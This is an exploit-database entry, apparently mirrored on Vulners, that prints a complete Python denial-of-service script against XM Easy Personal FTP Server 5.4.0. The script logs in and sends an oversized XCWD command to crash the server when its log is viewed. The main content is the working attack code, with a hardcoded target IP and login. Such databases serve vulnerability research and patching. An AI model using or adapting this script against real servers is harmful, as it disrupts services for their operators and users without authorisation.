Lucene search
K

XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service

🗓️ 13 Apr 2008 00:00:00Reported by j0rganType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

XM Easy Personal FTP Server 5.4.0 Denial of Service attack through 'XCWD' command leads to application cras

Code
#!/usr/bin/python
########################################
# XM Easy Personal FTP Server 5.4.0 (XCWD) DoS
#
# When admin looks at the server log, application crashes :)
#
# Elhamdulillahi Rabbil-alemin!
#
########################################
# bt ~ # ./sploit.py
#
# [+] Saljemo zli bafer :)
# [+] Now wait until the admin looks at server log :)
# [+] Finito!
#
########################################
# Vulnerability discovered and coded by Muris Kurgas a.k.a j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu
########################################

import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

bafer = '\x41' * 3000
print "\n [+] Saljemo zli bafer :)"
s.connect(('192.168.190.132',21))
data = s.recv(1024)
s.send('USER ftp' +'\r\n')
data = s.recv(1024)
s.send('PASS lozinka' +'\r\n')
data = s.recv(1024)
print " [+] Now wait until the admin looks at server log :)"
s.send('XCWD ' +bafer+ '\r\n')
s.close()
print " [+] Gotovo! "

# milw0rm.com [2008-04-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
25